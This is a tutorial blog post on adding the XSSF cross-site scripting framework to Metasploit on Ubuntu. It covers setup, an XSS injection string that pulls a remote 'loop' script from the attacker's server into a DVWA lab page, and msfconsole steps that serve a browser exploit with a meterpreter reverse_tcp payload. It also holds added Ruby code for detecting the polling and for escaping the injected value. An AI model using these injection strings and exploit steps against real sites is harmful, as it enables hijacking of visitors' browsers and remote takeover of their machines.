Add XSSF to Metasploit Framework on Ubuntu
- What is XSSF or the Cross-site Scripting Framework?
The XSS Framework (XSSF) is able to manage victims of a generic XSS attack and hold an existing connection with JavaScript loop refreshing in order to allow future browser-based attacks. After injection of the generic attack (the “loop” resource generated by XSSF), each victim browser asks the attack server (every “x” seconds) whether new commands are available.
The advantage of having the project built within the Metasploit Framework is the ability to run browser exploits already included in MSF. Unlike the existing projects (BeEF, XeeK, XSSShell/XSSTunnel), XSSF gives the possibility to simply add and run attacks (using MSF modules) and execute already existing MSF exploits without installing third-party solutions. MSF uses Ruby scripts to create server listeners that wait for exploited browsers to connect. In addition, the ability to create XSS tunnels with targeted victims is a real advantage.
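The polling behaviour described above is also what gives the defender something to look for: a hooked browser keeps fetching the same "/loop?interval=N" resource at the cadence N announces. The following is an added example, not code from the original post or from the XSSF project, that parses a small constructed web-proxy log and flags client/server pairs whose loop requests arrive at the announced interval. The log format, IP addresses and host names are assumptions made for the example.

```ruby
# Added example (not from the original post or the XSSF project): flag clients
# in a web-proxy log that poll a "/loop?interval=N" resource at the cadence the
# interval parameter announces. Log format, addresses and hosts are constructed.
require 'time'
require 'uri'

# Constructed proxy log lines: "<iso8601 time> <client ip> <method> <url>".
# 10.0.0.5 polls every 2 seconds; 10.0.0.7 hits a loop path only once.
SAMPLE_LOG = <<~LOG
  2011-03-01T10:00:00Z 10.0.0.5 GET http://203.0.113.10:8888/loop?interval=2
  2011-03-01T10:00:02Z 10.0.0.5 GET http://203.0.113.10:8888/loop?interval=2
  2011-03-01T10:00:04Z 10.0.0.5 GET http://203.0.113.10:8888/loop?interval=2
  2011-03-01T10:00:06Z 10.0.0.5 GET http://203.0.113.10:8888/loop?interval=2
  2011-03-01T10:00:01Z 10.0.0.7 GET http://intranet.example/index.php
  2011-03-01T10:00:03Z 10.0.0.7 GET http://intranet.example/loop?interval=2
  2011-03-01T10:00:09Z 10.0.0.7 GET http://intranet.example/style.css
LOG

LogEntry = Struct.new(:time, :client, :verb, :url)

def parse_log(text)
  text.each_line.map do |line|
    t, client, verb, url = line.split
    LogEntry.new(Time.iso8601(t), client, verb, url)
  end
end

# Returns [interval_seconds, "host:port"] if the URL looks like an XSSF-style
# loop resource with a numeric interval parameter, else nil.
def loop_request(url)
  uri = URI.parse(url)
  return nil unless uri.path.end_with?('/loop') && uri.query
  params = URI.decode_www_form(uri.query).to_h
  return nil unless params['interval'] =~ /\A\d+\z/
  [params['interval'].to_i, "#{uri.host}:#{uri.port}"]
end

# Group loop requests by (client, server, interval); report a group as a beacon
# when it has at least min_hits requests and every gap between consecutive
# requests is within tolerance seconds of the announced interval.
def find_beacons(entries, min_hits: 3, tolerance: 1.0)
  groups = Hash.new { |h, k| h[k] = [] }
  entries.each do |e|
    info = loop_request(e.url) or next
    groups[[e.client, info[1], info[0]]] << e.time
  end
  groups.map do |(client, server, interval), times|
    next nil if times.size < min_hits
    gaps = times.sort.each_cons(2).map { |a, b| b - a }
    next nil unless gaps.all? { |g| (g - interval).abs <= tolerance }
    { client: client, server: server, interval: interval, hits: times.size }
  end.compact
end

if __FILE__ == $0
  find_beacons(parse_log(SAMPLE_LOG)).each do |b|
    puts "possible XSSF loop beacon: #{b[:client]} -> #{b[:server]} " \
         "every #{b[:interval]}s (#{b[:hits]} hits)"
  end
end
```

The cadence check matters more than the path name: the path is trivially renamed by whoever deploys the framework, whereas a browser that has been told to poll every 2 seconds will keep doing so for as long as the page stays open.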
Video showing how XSSF works in Metasploit
Video showing how XSSF Tunnel works
Setting up XSSF Framework for Metasploit on Ubuntu 10.10
Download http://www.metasploit.com/redmine/attachments/596/XSSF.zip
UNZIP and copy files into metasploit /msf3 directory
cp -iR /home/user/Downloads/XSSF/data/ /opt/metasploit3/msf3/
cp -iR /home/user/Downloads/XSSF/lib/ /opt/metasploit3/msf3/
cp -iR /home/user/Downloads/XSSF/modules/ /opt/metasploit3/msf3/
cp -iR /home/user/Downloads/XSSF/plugins/ /opt/metasploit3/msf3/
RENAME the XSSF.rb ruby script (the filename is wrong in the zip file)
mv /opt/metasploit3/msf3/plugins/XSSF.rb /opt/metasploit3/msf3/plugins/xssf.rb
INSTALL MySQL IF NOT ALREADY INSTALLED
Install MySQL with Synaptic or apt-get
$ sudo apt-get install mysql-server mysql-client
$ sudo apt-get install libmysql-ruby libmysqlclient-dev
FIX MySQL ERROR: The database backend has not been initialized …
gem install mysql
(needed for XSSF to use MySQL driver)
FIX RUBY ERRORS DURING START OF METASPLOIT (UPGRADE RUBY TO 1.9.1)
apt-get install ruby1.9.1-full
(the mv and cp -s commands below assume your current directory is /usr/bin, where the ruby1.9.1 and gem1.9.1 binaries live)
mv /usr/bin/ruby ruby1.8_symlink
cp -s ruby1.9.1 ruby (-s creates a symbolic link to ruby version 1.9.1)
SET GEM VERSION TO 1.9.1
mv gem gem1.8_symlink
cp -s gem1.9.1 gem (-s creates a symbolic link to gem version 1.9.1)
NOW YOU NEED A SITE WITH AN XSS VULNERABILITY TO EXPLOIT:
Damn Vulnerable Web App LIVE CD
EXPLOIT: On DVWA as a Reflected or Stored Cross-site Scripting attack
http://server_ipaddress/?lang="><script src="http://xssf_ipaddress:8888/loop?interval=2"></script>
OR THIS INTO A SUBMIT FIELD ON THE PAGE
"><script src="http://xssf_ipaddress:8888/loop?interval=2"></script>
You will see the victim page refresh every 2 secs.
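The injection above works because the vulnerable page copies the lang parameter into its HTML without encoding it, so the leading "> closes the attribute and the rest is parsed as a new script tag. The following is an added example, not DVWA's code and not from the original post or XSSF, that models such a reflection point in Ruby: the unescaped template beside one that HTML-encodes the value, with a check that the post's injection string produces a live script tag in the first and plain text in the second. The templates, the check and the CSP header value are this example's own assumptions.

```ruby
# Added example (not from the original post, DVWA or XSSF): a minimal model of a
# page that reflects a "lang" query parameter into an HTML attribute, shown
# unescaped beside a version that HTML-encodes the value. Templates, the header
# value and the check are assumptions made for this example.
require 'cgi'

# The injection string from the post (host name kept as the post's placeholder).
INJECTION = %q{"><script src="http://xssf_ipaddress:8888/loop?interval=2"></script>}

# Vulnerable: the parameter is interpolated verbatim into an attribute value,
# so a leading "> closes the attribute and whatever follows becomes markup.
def render_vulnerable(lang)
  %(<input type="hidden" name="lang" value="#{lang}">)
end

# Hardened: CGI.escapeHTML turns &, <, >, " and ' into entities, so the value
# can neither close the attribute nor open a new tag.
def render_safe(lang)
  %(<input type="hidden" name="lang" value="#{CGI.escapeHTML(lang)}">)
end

# Defence in depth: with this response header the browser refuses to load
# script from any origin other than the page's own, so even a missed encoding
# point cannot pull in a remote "loop" resource.
CSP_HEADER = "Content-Security-Policy: script-src 'self'".freeze

# True when the rendered markup contains a real <script src=...> element,
# i.e. the parameter escaped the attribute context.
def injects_script?(html)
  !!(html =~ /<script\b[^>]*src=/i)
end

if __FILE__ == $0
  [['vulnerable', render_vulnerable(INJECTION)],
   ['hardened', render_safe(INJECTION)]].each do |label, html|
    puts "#{label}: #{html}"
    puts "  script tag present: #{injects_script?(html)}"
  end
end
```

The escaped output still contains the attacker's text, but only as the literal value of the hidden field; nothing in it is parsed as a tag, so no request to port 8888 ever leaves the browser.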
START METASPLOIT
$ /opt/metasploit3/msf3/msfconsole
msf> svn update (to get latest exploits, plugins, modules)
CONNECT METASPLOIT TO MYSQL DATABASE
msf> db_driver mysql
msf> db_connect user:pass@127.0.0.1:3306/msf3 (use the same password you set when installing MySQL above)
USING METASPLOIT (XSSF):
LOAD METASPLOIT XSSF AND TYPE
msf> load XSSF (case-sensitive)
XSSF responds with: Please run ‘http://ipaddress:8888/loop’ into any browser with JavaScript enabled
msf> xssf_victims (note victim 1)
msf> xssf_information 1
msf> use auxiliary/xssf/alert
msf> set AlertMessage XSS pop-up will appear
msf> run
USING METASPLOIT XSSF AUXILIARY MODULES:
EXPLOIT BROWSER VIA XSSF WITH VULNERABILITY OF CHOICE
msf> use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.82
msf> exploit
msf> jobs
msf> xssf_exploit 1 0
Source: http://securitystreetknowledge.com/?p=445